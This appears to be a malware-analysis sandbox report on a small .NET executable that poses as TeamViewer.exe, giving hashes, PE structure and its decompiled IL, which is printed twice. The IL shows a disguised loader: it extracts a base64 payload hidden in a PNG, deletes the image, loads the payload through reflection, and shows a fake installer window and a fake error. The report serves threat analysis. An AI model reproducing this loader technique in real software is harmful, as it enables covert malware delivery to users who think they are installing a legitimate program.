Suspicious
Suspect

76fbf365ceea6b3fae4a587db63540ed

PE Executable
|
MD5: 76fbf365ceea6b3fae4a587db63540ed
|
Size: 10.75 KB
|
application/x-dosexec

Summary by MalvaGPT
Characteristics

Symbol Obfuscation Score

Low

Hash
 Hash Value
MD5
76fbf365ceea6b3fae4a587db63540ed
Sha1
06f4df3f12d6bb03d3af5ccfe00a661fd74a92a8
Sha256
94e6b572be50d90479283ce0d884436ce4a84cdd22a638a282628e6721af29f4
Sha384
65c45fa06823528cfdd90b9a9f5e5db59c6bbec2a62e2da1ade9c5449622fe536124db3849f6fd2ea909ad4733ee857d
Sha512
be709146e045176e5c1420b8b28c960a92f7958cce15c7dada95e3af5f04eb51fc6b3f1e09eebfd3cc6a355b95e1d5ba12786a662845bc5a5a7c3830235bfaa1
SSDeep
192:7zzTe4Qs3WBN+Oc1Tk8dYcsNOSKZSdY8:f1QzBNiTk8dYBoFZSdY
TLSH
F122FA1967E48637E9BB2F39AC72614007B1B616EC23DB6E2EC0D45F5E732108C727A1

PeID

.NET executable
Microsoft Visual C# / Basic .NET
Microsoft Visual C# / Basic.NET / MS Visual Basic 2005 - ASL
Microsoft Visual C# v7.0 / Basic .NET
Microsoft Visual Studio .NET
File Structure
76fbf365ceea6b3fae4a587db63540ed
Structure
DosHeader
PE Header
Optional Header (x86)
Section Headers
.text
.rsrc
.reloc
Resources
RT_VERSION
ID:0001
ID:0
RT_MANIFEST
ID:0001
ID:0
.Net Resources
ConsoleApp1.Properties.Resources.resources
Informations
Name
 Value
Info

PE Detect: PeReader OK (file layout)
Info

PDB Path: C:\Users\Work\source\repos\test2025\ConsoleApp1\obj\Debug\TeamViewer.pdb
Module Name

TeamViewer.exe
Full Name

TeamViewer.exe
EntryPoint

System.Void mamu4itel::Main()
Scope Name

TeamViewer.exe
Scope Type

ModuleDef
Kind

Windows
Runtime Version

v4.0.30319
Tables Header Version

512
WinMD Version

<null>
Assembly Name

TeamViewer
Assembly Version

3.1.122.7
Assembly Culture

<null>
Has PublicKey

False
PublicKey Token

<null>
Target Framework

.NETFramework,Version=v4.8.1
Total Strings

14
Main Method

System.Void mamu4itel::Main()
Main IL Instruction Count

171
Main IL

newobj System.Void mamu4itel/<>c__DisplayClass0_0::.ctor() stloc.0 <null> nop <null> call System.AppDomain System.AppDomain::get_CurrentDomain() callvirt System.String System.AppDomain::get_BaseDirectory() stloc.1 <null> ldloc.1 <null> ldstr *.png call System.String[] System.IO.Directory::GetFiles(System.String,System.String) ldc.i4.0 <null> ldelem.ref <null> stloc.2 <null> ldloc.2 <null> call System.Byte[] mamu4itel::ExtractDataFromImage(System.String) stloc.3 <null> ldloc.2 <null> call System.Void mamu4itel::DeleteImageFile(System.String) nop <null> call System.Text.Encoding System.Text.Encoding::get_UTF8() ldloc.3 <null> callvirt System.String System.Text.Encoding::GetString(System.Byte[]) call System.Byte[] System.Convert::FromBase64String(System.String) call System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[]) stloc.s V_4 ldloc.s V_4 ldstr ConsoleApp2.Program callvirt System.Type System.Reflection.Assembly::GetType(System.String) stloc.s V_5 ldloc.0 <null> ldloc.s V_5 ldstr Main callvirt System.Reflection.MethodInfo System.Type::GetMethod(System.String) stfld System.Reflection.MethodInfo mamu4itel/<>c__DisplayClass0_0::method ldloc.0 <null> newobj System.Void System.Windows.Forms.Form::.ctor() dup <null> ldstr Installing callvirt System.Void System.Windows.Forms.Control::set_Text(System.String) nop <null> dup <null> ldc.i4 400 ldc.i4 150 newobj System.Void System.Drawing.Size::.ctor(System.Int32,System.Int32) callvirt System.Void System.Windows.Forms.Form::set_Size(System.Drawing.Size) nop <null> dup <null> ldc.i4.1 <null> callvirt System.Void System.Windows.Forms.Form::set_StartPosition(System.Windows.Forms.FormStartPosition) nop <null> dup <null> ldc.i4.3 <null> callvirt System.Void System.Windows.Forms.Form::set_FormBorderStyle(System.Windows.Forms.FormBorderStyle) nop <null> dup <null> ldc.i4.0 <null> callvirt System.Void System.Windows.Forms.Form::set_MaximizeBox(System.Boolean) nop <null> dup <null> ldc.i4.0 <null> callvirt System.Void System.Windows.Forms.Form::set_MinimizeBox(System.Boolean) nop <null> dup <null> ldc.i4.0 <null> callvirt System.Void System.Windows.Forms.Form::set_ControlBox(System.Boolean) nop <null> stfld System.Windows.Forms.Form mamu4itel/<>c__DisplayClass0_0::loadingForm ldloc.0 <null> ldc.i4.0 <null> stfld System.Boolean mamu4itel/<>c__DisplayClass0_0::allowClose ldloc.0 <null> ldfld System.Windows.Forms.Form mamu4itel/<>c__DisplayClass0_0::loadingForm ldloc.0 <null> ldftn System.Void mamu4itel/<>c__DisplayClass0_0::<Main>b__0(System.Object,System.Windows.Forms.FormClosingEventArgs) newobj System.Void System.Windows.Forms.FormClosingEventHandler::.ctor(System.Object,System.IntPtr) callvirt System.Void System.Windows.Forms.Form::add_FormClosing(System.Windows.Forms.FormClosingEventHandler) nop <null> newobj System.Void System.Windows.Forms.Label::.ctor() dup <null> ldstr Loading.... callvirt System.Void System.Windows.Forms.Control::set_Text(System.String) nop <null> dup <null> ldc.i4.1 <null> callvirt System.Void System.Windows.Forms.Control::set_AutoSize(System.Boolean) nop <null> dup <null> ldc.i4.s 10 ldc.i4.s 10 newobj System.Void System.Drawing.Point::.ctor(System.Int32,System.Int32) callvirt System.Void System.Windows.Forms.Control::set_Location(System.Drawing.Point) nop <null> stloc.s V_6 ldloc.0 <null> newobj System.Void System.Windows.Forms.ProgressBar::.ctor() dup <null> ldc.i4.s 10 ldc.i4.s 40 newobj System.Void System.Drawing.Point::.ctor(System.Int32,System.Int32) callvirt System.Void System.Windows.Forms.Control::set_Location(System.Drawing.Point) nop <null> dup <null> ldc.i4.s 20 callvirt System.Void System.Windows.Forms.Control::set_Height(System.Int32) nop <null> dup <null> ldc.i4.s 100 callvirt System.Void System.Windows.Forms.ProgressBar::set_Maximum(System.Int32) nop <null> dup <null> ldc.i4.0 <null> callvirt System.Void System.Windows.Forms.ProgressBar::set_Value(System.Int32) nop <null> stfld System.Windows.Forms.ProgressBar mamu4itel/<>c__DisplayClass0_0::pb ldloc.0 <null> ldfld System.Windows.Forms.Form mamu4itel/<>c__DisplayClass0_0::loadingForm callvirt System.Windows.Forms.Control/ControlCollection System.Windows.Forms.Control::get_Controls() ldloc.s V_6 callvirt System.Void System.Windows.Forms.Control/ControlCollection::Add(System.Windows.Forms.Control) nop <null> ldloc.0 <null> ldfld System.Windows.Forms.Form mamu4itel/<>c__DisplayClass0_0::loadingForm callvirt System.Windows.Forms.Control/ControlCollection System.Windows.Forms.Control::get_Controls() ldloc.0 <null> ldfld System.Windows.Forms.ProgressBar mamu4itel/<>c__DisplayClass0_0::pb callvirt System.Void System.Windows.Forms.Control/ControlCollection::Add(System.Windows.Forms.Control) nop <null> ldloc.0 <null> ldfld System.Windows.Forms.ProgressBar mamu4itel/<>c__DisplayClass0_0::pb ldloc.0 <null> ldfld System.Windows.Forms.Form mamu4itel/<>c__DisplayClass0_0::loadingForm callvirt System.Drawing.Size System.Windows.Forms.Form::get_ClientSize() stloc.s V_7 ldloca.s V_7 call System.Int32 System.Drawing.Size::get_Width() ldc.i4.s 20 sub <null> callvirt System.Void System.Windows.Forms.Control::set_Width(System.Int32) nop <null> ldloc.0 <null> newobj System.Void System.Windows.Forms.Timer::.ctor() dup <null> ldc.i4.s 122 callvirt System.Void System.Windows.Forms.Timer::set_Interval(System.Int32) nop <null> stfld System.Windows.Forms.Timer mamu4itel/<>c__DisplayClass0_0::timer ldloc.0 <null> ldc.i4.0 <null> stfld System.Int32 mamu4itel/<>c__DisplayClass0_0::prog ldloc.0 <null> ldfld System.Windows.Forms.Timer mamu4itel/<>c__DisplayClass0_0::timer ldloc.0 <null> ldftn System.Void mamu4itel/<>c__DisplayClass0_0::<Main>b__1(System.Object,System.EventArgs) newobj System.Void System.EventHandler::.ctor(System.Object,System.IntPtr) callvirt System.Void System.Windows.Forms.Timer::add_Tick(System.EventHandler) nop <null> ldloc.0 <null> ldfld System.Windows.Forms.Form mamu4itel/<>c__DisplayClass0_0::loadingForm ldloc.0 <null> ldftn System.Void mamu4itel/<>c__DisplayClass0_0::<Main>b__2(System.Object,System.EventArgs) newobj System.Void System.EventHandler::.ctor(System.Object,System.IntPtr) callvirt System.Void System.Windows.Forms.Form::add_Shown(System.EventHandler) nop <null> ldloc.0 <null> ldfld System.Windows.Forms.Form mamu4itel/<>c__DisplayClass0_0::loadingForm callvirt System.Windows.Forms.DialogResult System.Windows.Forms.Form::ShowDialog() pop <null> ldstr Sorry, this program cannot be installed. ldstr Error call System.Windows.Forms.DialogResult System.Windows.Forms.MessageBox::Show(System.String,System.String) pop <null> ret <null>
Module Name

TeamViewer.exe
Full Name

TeamViewer.exe
EntryPoint

System.Void mamu4itel::Main()
Scope Name

TeamViewer.exe
Scope Type

ModuleDef
Kind

Windows
Runtime Version

v4.0.30319
Tables Header Version

512
WinMD Version

<null>
Assembly Name

TeamViewer
Assembly Version

3.1.122.7
Assembly Culture

<null>
Has PublicKey

False
PublicKey Token

<null>
Target Framework

.NETFramework,Version=v4.8.1
Total Strings

14
Main Method

System.Void mamu4itel::Main()
Main IL Instruction Count

171
Main IL

newobj System.Void mamu4itel/<>c__DisplayClass0_0::.ctor() stloc.0 <null> nop <null> call System.AppDomain System.AppDomain::get_CurrentDomain() callvirt System.String System.AppDomain::get_BaseDirectory() stloc.1 <null> ldloc.1 <null> ldstr *.png call System.String[] System.IO.Directory::GetFiles(System.String,System.String) ldc.i4.0 <null> ldelem.ref <null> stloc.2 <null> ldloc.2 <null> call System.Byte[] mamu4itel::ExtractDataFromImage(System.String) stloc.3 <null> ldloc.2 <null> call System.Void mamu4itel::DeleteImageFile(System.String) nop <null> call System.Text.Encoding System.Text.Encoding::get_UTF8() ldloc.3 <null> callvirt System.String System.Text.Encoding::GetString(System.Byte[]) call System.Byte[] System.Convert::FromBase64String(System.String) call System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[]) stloc.s V_4 ldloc.s V_4 ldstr ConsoleApp2.Program callvirt System.Type System.Reflection.Assembly::GetType(System.String) stloc.s V_5 ldloc.0 <null> ldloc.s V_5 ldstr Main callvirt System.Reflection.MethodInfo System.Type::GetMethod(System.String) stfld System.Reflection.MethodInfo mamu4itel/<>c__DisplayClass0_0::method ldloc.0 <null> newobj System.Void System.Windows.Forms.Form::.ctor() dup <null> ldstr Installing callvirt System.Void System.Windows.Forms.Control::set_Text(System.String) nop <null> dup <null> ldc.i4 400 ldc.i4 150 newobj System.Void System.Drawing.Size::.ctor(System.Int32,System.Int32) callvirt System.Void System.Windows.Forms.Form::set_Size(System.Drawing.Size) nop <null> dup <null> ldc.i4.1 <null> callvirt System.Void System.Windows.Forms.Form::set_StartPosition(System.Windows.Forms.FormStartPosition) nop <null> dup <null> ldc.i4.3 <null> callvirt System.Void System.Windows.Forms.Form::set_FormBorderStyle(System.Windows.Forms.FormBorderStyle) nop <null> dup <null> ldc.i4.0 <null> callvirt System.Void System.Windows.Forms.Form::set_MaximizeBox(System.Boolean) nop <null> dup <null> ldc.i4.0 <null> callvirt System.Void System.Windows.Forms.Form::set_MinimizeBox(System.Boolean) nop <null> dup <null> ldc.i4.0 <null> callvirt System.Void System.Windows.Forms.Form::set_ControlBox(System.Boolean) nop <null> stfld System.Windows.Forms.Form mamu4itel/<>c__DisplayClass0_0::loadingForm ldloc.0 <null> ldc.i4.0 <null> stfld System.Boolean mamu4itel/<>c__DisplayClass0_0::allowClose ldloc.0 <null> ldfld System.Windows.Forms.Form mamu4itel/<>c__DisplayClass0_0::loadingForm ldloc.0 <null> ldftn System.Void mamu4itel/<>c__DisplayClass0_0::<Main>b__0(System.Object,System.Windows.Forms.FormClosingEventArgs) newobj System.Void System.Windows.Forms.FormClosingEventHandler::.ctor(System.Object,System.IntPtr) callvirt System.Void System.Windows.Forms.Form::add_FormClosing(System.Windows.Forms.FormClosingEventHandler) nop <null> newobj System.Void System.Windows.Forms.Label::.ctor() dup <null> ldstr Loading.... callvirt System.Void System.Windows.Forms.Control::set_Text(System.String) nop <null> dup <null> ldc.i4.1 <null> callvirt System.Void System.Windows.Forms.Control::set_AutoSize(System.Boolean) nop <null> dup <null> ldc.i4.s 10 ldc.i4.s 10 newobj System.Void System.Drawing.Point::.ctor(System.Int32,System.Int32) callvirt System.Void System.Windows.Forms.Control::set_Location(System.Drawing.Point) nop <null> stloc.s V_6 ldloc.0 <null> newobj System.Void System.Windows.Forms.ProgressBar::.ctor() dup <null> ldc.i4.s 10 ldc.i4.s 40 newobj System.Void System.Drawing.Point::.ctor(System.Int32,System.Int32) callvirt System.Void System.Windows.Forms.Control::set_Location(System.Drawing.Point) nop <null> dup <null> ldc.i4.s 20 callvirt System.Void System.Windows.Forms.Control::set_Height(System.Int32) nop <null> dup <null> ldc.i4.s 100 callvirt System.Void System.Windows.Forms.ProgressBar::set_Maximum(System.Int32) nop <null> dup <null> ldc.i4.0 <null> callvirt System.Void System.Windows.Forms.ProgressBar::set_Value(System.Int32) nop <null> stfld System.Windows.Forms.ProgressBar mamu4itel/<>c__DisplayClass0_0::pb ldloc.0 <null> ldfld System.Windows.Forms.Form mamu4itel/<>c__DisplayClass0_0::loadingForm callvirt System.Windows.Forms.Control/ControlCollection System.Windows.Forms.Control::get_Controls() ldloc.s V_6 callvirt System.Void System.Windows.Forms.Control/ControlCollection::Add(System.Windows.Forms.Control) nop <null> ldloc.0 <null> ldfld System.Windows.Forms.Form mamu4itel/<>c__DisplayClass0_0::loadingForm callvirt System.Windows.Forms.Control/ControlCollection System.Windows.Forms.Control::get_Controls() ldloc.0 <null> ldfld System.Windows.Forms.ProgressBar mamu4itel/<>c__DisplayClass0_0::pb callvirt System.Void System.Windows.Forms.Control/ControlCollection::Add(System.Windows.Forms.Control) nop <null> ldloc.0 <null> ldfld System.Windows.Forms.ProgressBar mamu4itel/<>c__DisplayClass0_0::pb ldloc.0 <null> ldfld System.Windows.Forms.Form mamu4itel/<>c__DisplayClass0_0::loadingForm callvirt System.Drawing.Size System.Windows.Forms.Form::get_ClientSize() stloc.s V_7 ldloca.s V_7 call System.Int32 System.Drawing.Size::get_Width() ldc.i4.s 20 sub <null> callvirt System.Void System.Windows.Forms.Control::set_Width(System.Int32) nop <null> ldloc.0 <null> newobj System.Void System.Windows.Forms.Timer::.ctor() dup <null> ldc.i4.s 122 callvirt System.Void System.Windows.Forms.Timer::set_Interval(System.Int32) nop <null> stfld System.Windows.Forms.Timer mamu4itel/<>c__DisplayClass0_0::timer ldloc.0 <null> ldc.i4.0 <null> stfld System.Int32 mamu4itel/<>c__DisplayClass0_0::prog ldloc.0 <null> ldfld System.Windows.Forms.Timer mamu4itel/<>c__DisplayClass0_0::timer ldloc.0 <null> ldftn System.Void mamu4itel/<>c__DisplayClass0_0::<Main>b__1(System.Object,System.EventArgs) newobj System.Void System.EventHandler::.ctor(System.Object,System.IntPtr) callvirt System.Void System.Windows.Forms.Timer::add_Tick(System.EventHandler) nop <null> ldloc.0 <null> ldfld System.Windows.Forms.Form mamu4itel/<>c__DisplayClass0_0::loadingForm ldloc.0 <null> ldftn System.Void mamu4itel/<>c__DisplayClass0_0::<Main>b__2(System.Object,System.EventArgs) newobj System.Void System.EventHandler::.ctor(System.Object,System.IntPtr) callvirt System.Void System.Windows.Forms.Form::add_Shown(System.EventHandler) nop <null> ldloc.0 <null> ldfld System.Windows.Forms.Form mamu4itel/<>c__DisplayClass0_0::loadingForm callvirt System.Windows.Forms.DialogResult System.Windows.Forms.Form::ShowDialog() pop <null> ldstr Sorry, this program cannot be installed. ldstr Error call System.Windows.Forms.DialogResult System.Windows.Forms.MessageBox::Show(System.String,System.String) pop <null> ret <null>
76fbf365ceea6b3fae4a587db63540ed (10.75 KB)
File Structure
76fbf365ceea6b3fae4a587db63540ed
Structure
DosHeader
PE Header
Optional Header (x86)
Section Headers
.text
.rsrc
.reloc
Resources
RT_VERSION
ID:0001
ID:0
RT_MANIFEST
ID:0001
ID:0
.Net Resources
ConsoleApp1.Properties.Resources.resources
Characteristics
No malware configuration were found at this point.
You must be signed in to post a comment.
An error has occurred. This application may no longer respond until reloaded. Reload 🗙